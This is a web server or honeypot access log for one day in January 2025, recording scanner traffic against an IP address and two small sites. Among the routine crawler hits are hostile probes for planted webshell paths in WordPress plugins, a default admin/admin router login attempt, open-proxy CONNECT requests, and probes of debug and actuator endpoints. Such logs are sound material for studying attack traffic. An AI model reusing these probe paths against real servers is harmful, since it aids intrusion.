[2025-01-02 00:02:22] Connection from: ('95.214.55.32', 56464) [2025-01-02 00:02:22] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 00:02:36] Connection from: ('95.214.53.205', 43958) [2025-01-02 00:02:36] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 00:02:45] Connection from: ('95.214.55.186', 39470) [2025-01-02 00:02:46] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 00:21:03] Connection from: ('64.62.197.96', 44955) [2025-01-02 00:37:41] Connection from: ('185.147.125.18', 62244) [2025-01-02 00:37:41] GET / HTTP/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.61 Chrome/124.0.6367.61 Not-A.Brand/99 Safari/537.36 Referer: http://senddeath.com/ Host: senddeath.com Connection: close [2025-01-02 00:38:01] Connection from: ('185.147.125.18', 51466) [2025-01-02 00:38:01] GET /contact.html HTTP/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.61 Chrome/124.0.6367.61 Not-A.Brand/99 Safari/537.36 Referer: http://senddeath.com/contact.html Host: senddeath.com Connection: close [2025-01-02 00:38:21] Connection from: ('185.147.125.18', 63052) [2025-01-02 00:38:21] GET /contact.py HTTP/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.61 Chrome/124.0.6367.61 Not-A.Brand/99 Safari/537.36 Referer: http://senddeath.com/contact.py Host: senddeath.com Connection: close [2025-01-02 01:02:03] Connection from: ('139.59.123.61', 61089) [2025-01-02 01:02:03] GET /wp-admin/includes/nav.php HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 [2025-01-02 01:02:03] Sending 404: wp-admin/includes/nav.php [2025-01-02 01:12:29] Connection from: ('95.214.55.186', 50076) [2025-01-02 01:12:29] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 01:21:31] Connection from: ('147.185.133.192', 62346) [2025-01-02 01:21:31] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip [2025-01-02 01:27:30] Connection from: ('80.94.93.191', 61011) [2025-01-02 01:27:32] GET / HTTP/1.0 User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan) Accept: */* [2025-01-02 01:34:54] Connection from: ('139.59.123.61', 63541) [2025-01-02 01:34:54] GET /.well-known/acme-challenge/zmFM.php HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 [2025-01-02 01:34:54] Sending 404: .well-known/acme-challenge/zmFM.php [2025-01-02 01:35:42] Connection from: ('139.59.123.61', 51411) [2025-01-02 01:35:42] GET /plugins/function.php HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 [2025-01-02 01:35:42] Sending 404: plugins/function.php [2025-01-02 01:48:01] Connection from: ('172.206.146.163', 55860) [2025-01-02 01:48:01] GET /hudson HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 zgrab/0.x Accept: */* Accept-Encoding: gzip [2025-01-02 01:48:01] Sending 404: hudson [2025-01-02 01:57:36] Connection from: ('117.209.26.112', 55334) [2025-01-02 01:57:39] GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0 [2025-01-02 01:57:39] Sending 404: boaform/admin/formLogin [2025-01-02 02:06:58] Connection from: ('18.218.10.228', 45590) [2025-01-02 02:08:20] Connection from: ('18.218.10.228', 48188) [2025-01-02 02:08:22] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip [2025-01-02 02:21:44] Connection from: ('93.174.93.12', 60000) [2025-01-02 02:36:18] Connection from: ('52.160.35.194', 42652) [2025-01-02 02:36:18] MGLNDD_76.169.26.194_80 [2025-01-02 02:38:26] Connection from: ('141.98.11.155', 37830) [2025-01-02 02:38:26] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 02:38:37] Connection from: ('43.159.128.155', 47674) [2025-01-02 02:38:37] GET / HTTP/1.1 Host: www.sourcegrabber.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 02:42:40] Connection from: ('3.142.47.109', 48932) [2025-01-02 02:44:01] Connection from: ('3.142.47.109', 49268) [2025-01-02 02:44:03] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip [2025-01-02 02:49:56] Connection from: ('34.245.165.35', 58614) [2025-01-02 02:49:57] GET / HTTP/1.0 Host: www.senddeath.com Accept-Language: en-gb,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: identity Connection: close [2025-01-02 03:02:57] Connection from: ('95.214.55.186', 44146) [2025-01-02 03:02:57] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 03:37:37] Connection from: ('43.159.144.16', 54204) [2025-01-02 03:37:38] GET / HTTP/1.1 Host: www.senddeath.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 03:40:36] Connection from: ('185.242.226.99', 34119) [2025-01-02 03:40:36] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 Accept: */* Accept-Encoding: gzip [2025-01-02 03:53:36] Connection from: ('184.105.139.69', 40294) [2025-01-02 03:53:36] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Encoding: gzip [2025-01-02 03:56:42] Connection from: ('184.105.139.69', 54788) [2025-01-02 03:56:42] GET /favicon.ico HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05) Accept: */* Accept-Encoding: gzip [2025-01-02 03:56:42] Sending 404: favicon.ico [2025-01-02 03:57:39] Connection from: ('184.105.139.69', 8450) [2025-01-02 03:57:39] GET /geoserver/web/ HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Encoding: gzip [2025-01-02 03:57:39] Sending 404: geoserver/web/ [2025-01-02 03:59:42] Connection from: ('124.70.45.225', 42890) [2025-01-02 03:59:42] GET / HTTP/1.1 Host: 76.169.26.194 Accept: */* [2025-01-02 04:08:22] Connection from: ('154.213.187.122', 50808) [2025-01-02 04:08:22] GET /login.rsp HTTP/1.1 Host: 76.169.26.194:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Hello World [2025-01-02 04:08:22] Sending 404: login.rsp [2025-01-02 04:30:14] Connection from: ('46.19.138.234', 44022) [2025-01-02 04:30:14] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 04:30:18] Connection from: ('45.202.35.227', 59110) [2025-01-02 04:30:18] [2025-01-02 04:30:20] Connection from: ('45.202.35.227', 59114) [2025-01-02 04:30:20] [2025-01-02 04:30:27] Connection from: ('45.202.35.227', 43116) [2025-01-02 04:30:27] [2025-01-02 04:36:34] Connection from: ('179.43.191.146', 34648) [2025-01-02 04:36:34] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 04:36:59] Connection from: ('147.182.143.204', 49162) [2025-01-02 04:36:59] GET / HTTP/1.1 Host: 76.169.26.194 Accept: */* [2025-01-02 04:43:19] Connection from: ('182.42.105.85', 51411) [2025-01-02 04:43:19] GET / HTTP/1.1 Host: www.sourcegrabber.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 04:51:37] Connection from: ('139.59.123.61', 64643) [2025-01-02 04:51:37] GET /wp-includes/certificates/wp-conflg.php HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 [2025-01-02 04:51:37] Sending 404: wp-includes/certificates/wp-conflg.php [2025-01-02 04:55:38] Connection from: ('95.214.55.186', 59012) [2025-01-02 04:55:38] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 05:02:44] Connection from: ('217.160.202.182', 52412) [2025-01-02 05:02:44] GET / HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54 Accept: */* Accept-Encoding: gzip, deflate, identity [2025-01-02 05:19:51] Connection from: ('195.3.223.55', 58388) [2025-01-02 05:19:51] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 05:29:45] Connection from: ('46.23.108.183', 34500) [2025-01-02 05:29:45] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip [2025-01-02 05:38:53] Connection from: ('80.66.83.49', 42630) [2025-01-02 05:38:53] 4eI [2025-01-02 05:39:53] Connection from: ('80.66.83.49', 48788) [2025-01-02 05:39:53]  [2025-01-02 05:40:53] Connection from: ('80.66.83.49', 50176) [2025-01-02 05:40:53] CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1 Host: hotmail-com.olc.protection.outlook.com:25 [2025-01-02 05:40:53] Sending 404: hotmail-com.olc.protection.outlook.com:25 [2025-01-02 05:41:21] Connection from: ('185.147.125.24', 53463) [2025-01-02 05:41:21] GET / HTTP/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99 Safari/537.36 Referer: http://sourcegrabber.com/ Host: sourcegrabber.com Connection: close [2025-01-02 05:41:41] Connection from: ('185.147.125.24', 54952) [2025-01-02 05:41:41] GET /contact.html HTTP/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99 Safari/537.36 Referer: http://sourcegrabber.com/contact.html Host: sourcegrabber.com Connection: close [2025-01-02 05:42:02] Connection from: ('185.147.125.24', 62197) [2025-01-02 05:42:02] GET /contact.py HTTP/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99 Safari/537.36 Referer: http://sourcegrabber.com/contact.py Host: sourcegrabber.com Connection: close [2025-01-02 05:56:24] Connection from: ('170.39.194.124', 37420) [2025-01-02 05:56:24] CONNECT www.google.com:443 HTTP/1.1 Host: www.google.com:443 User-Agent: Go-http-client/1.1 [2025-01-02 05:56:24] Sending 404: www.google.com:443 [2025-01-02 06:31:13] Connection from: ('95.214.55.186', 41430) [2025-01-02 06:31:13] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 06:37:27] Connection from: ('152.42.238.29', 56024) [2025-01-02 06:37:27] GET / HTTP/1.1 Host: sourcegrabber.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 [2025-01-02 06:38:38] Connection from: ('13.64.108.199', 60546) [2025-01-02 06:38:38] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 zgrab/0.x Accept: */* Accept-Encoding: gzip [2025-01-02 06:38:39] Connection from: ('152.42.238.29', 63466) [2025-01-02 06:38:39] GET /feed/ HTTP/1.1 Host: sourcegrabber.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/html Content-Length: 2 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 [2025-01-02 06:38:39] Sending 404: feed/ [2025-01-02 06:48:43] Connection from: ('178.254.29.124', 58234) [2025-01-02 06:48:43] GET / HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54 Accept: */* Accept-Encoding: gzip, deflate, identity [2025-01-02 06:54:08] Connection from: ('95.214.53.205', 37418) [2025-01-02 06:54:08] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194:80 [2025-01-02 06:55:32] Connection from: ('206.168.34.53', 59328) [2025-01-02 06:55:33] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) Accept: */* Accept-Encoding: gzip [2025-01-02 06:55:35] Connection from: ('206.168.34.53', 59332) [2025-01-02 06:55:37] GET /favicon.ico HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) Accept-Encoding: gzip Connection: close [2025-01-02 06:55:37] Sending 404: favicon.ico [2025-01-02 06:55:40] Connection from: ('206.168.34.53', 39350) [2025-01-02 06:55:44] PRI * HTTP/2.0 SM Bh [2025-01-02 06:55:44] Sending 404: * [2025-01-02 06:55:48] Connection from: ('139.59.123.61', 64878) [2025-01-02 06:55:48] GET /wp-content/themes/too.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:55:48] Sending 404: wp-content/themes/too.php [2025-01-02 06:55:59] Connection from: ('139.59.123.61', 58289) [2025-01-02 06:55:59] GET /wp-content/plugins/helloapx/wp-apxupx.php?apx=upx HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:55:59] Sending 404: wp-content/plugins/helloapx/wp-apxupx.php [2025-01-02 06:56:09] Connection from: ('139.59.123.61', 55268) [2025-01-02 06:56:09] GET /wp-content/plugins/dhon/newsfeed.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:56:09] Sending 404: wp-content/plugins/dhon/newsfeed.php [2025-01-02 06:56:20] Connection from: ('139.59.123.61', 61393) [2025-01-02 06:56:20] GET /wp-admin/includes/nav.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:56:20] Sending 404: wp-admin/includes/nav.php [2025-01-02 06:56:30] Connection from: ('139.59.123.61', 59961) [2025-01-02 06:56:30] GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:56:30] Sending 404: wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php [2025-01-02 06:56:41] Connection from: ('139.59.123.61', 59621) [2025-01-02 06:56:41] GET /wp-content/plugins/wpcall-button/button-image.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:56:41] Sending 404: wp-content/plugins/wpcall-button/button-image.php [2025-01-02 06:56:55] Connection from: ('139.59.123.61', 57309) [2025-01-02 06:56:55] GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:56:55] Sending 404: wp-content/plugins/Core-Econ/upH.php [2025-01-02 06:57:18] Connection from: ('139.59.123.61', 57348) [2025-01-02 06:57:18] GET /wp-content/plugins/phpadmin/acp.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:57:18] Sending 404: wp-content/plugins/phpadmin/acp.php [2025-01-02 06:57:29] Connection from: ('139.59.123.61', 52625) [2025-01-02 06:57:29] GET /wp-content/plugins/phpad/acp.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 06:57:29] Sending 404: wp-content/plugins/phpad/acp.php [2025-01-02 07:11:33] Connection from: ('141.98.11.155', 60946) [2025-01-02 07:11:33] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 07:22:23] Connection from: ('49.51.52.250', 37492) [2025-01-02 07:22:23] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 08:01:55] Connection from: ('125.94.144.102', 41534) [2025-01-02 08:01:55] GET / HTTP/1.1 Host: www.senddeath.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 08:09:35] Connection from: ('207.90.244.3', 33360) [2025-01-02 08:09:35] GET / HTTP/1.1 Accept-Encoding: identity Host: 76.169.26.194 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 [2025-01-02 08:09:35] Connection from: ('207.90.244.3', 33364) [2025-01-02 08:09:35] GET /robots.txt HTTP/1.1 Host: 76.169.26.194 Accept-Encoding: identity [2025-01-02 08:09:35] Sending 404: robots.txt [2025-01-02 08:09:36] Connection from: ('207.90.244.3', 33376) [2025-01-02 08:09:36] GET /sitemap.xml HTTP/1.1 Host: 76.169.26.194 Accept-Encoding: identity [2025-01-02 08:09:36] Sending 404: sitemap.xml [2025-01-02 08:09:36] Connection from: ('207.90.244.3', 33384) [2025-01-02 08:09:36] GET /.well-known/security.txt HTTP/1.1 Host: 76.169.26.194 Accept-Encoding: identity [2025-01-02 08:09:36] Sending 404: .well-known/security.txt [2025-01-02 08:09:36] Connection from: ('207.90.244.3', 33388) [2025-01-02 08:09:36] GET /favicon.ico HTTP/1.1 Host: 76.169.26.194 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 [2025-01-02 08:09:36] Sending 404: favicon.ico [2025-01-02 08:11:12] Connection from: ('194.38.23.18', 65246) [2025-01-02 08:11:12] GET /admin/elfinder/connectors/php/connector.php HTTP/1.1 Accept: */* User-Agent: ALittle Client Host: senddeath.com Content-Type: application/json Content-Length: 0 Connection: Keep-Alive [2025-01-02 08:11:12] Sending 404: admin/elfinder/connectors/php/connector.php [2025-01-02 08:20:47] Connection from: ('95.214.53.205', 33864) [2025-01-02 08:20:47] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194:80 [2025-01-02 08:22:14] Connection from: ('54.171.231.245', 39808) [2025-01-02 08:22:14] GET / HTTP/1.0 Host: www.senddeath.com Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity User-Agent: Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Connection: close [2025-01-02 08:22:56] Connection from: ('112.159.90.5', 43492) [2025-01-02 08:22:56] GET / HTTP/1.0 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Connection: close [2025-01-02 08:28:49] Connection from: ('92.255.57.58', 55980) [2025-01-02 08:28:49] GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 Host: 76.169.26.194:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Encoding: gzip Connection: close [2025-01-02 08:31:10] Connection from: ('95.214.55.186', 32956) [2025-01-02 08:31:10] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 08:31:28] Connection from: ('95.214.55.32', 33142) [2025-01-02 08:31:28] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 08:33:45] Connection from: ('195.3.223.55', 44272) [2025-01-02 08:33:45] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 08:49:50] Connection from: ('95.214.53.198', 34776) [2025-01-02 08:49:50] GET /cgi-bin/avalanch.asp HTTP/1.1 Host: 76.169.26.194:80 User-Agent: Linux Gnu (cow) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 [2025-01-02 08:49:50] Sending 404: cgi-bin/avalanch.asp [2025-01-02 09:32:22] Connection from: ('92.255.57.58', 34776) [2025-01-02 09:32:22] GET /actuator/gateway/routes HTTP/1.1 Host: 76.169.26.194:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Encoding: gzip Connection: close [2025-01-02 09:32:22] Sending 404: actuator/gateway/routes [2025-01-02 09:43:13] Connection from: ('95.214.55.186', 37960) [2025-01-02 09:43:13] GET / HTTP/1.1 Host: 76.169.26.194:80 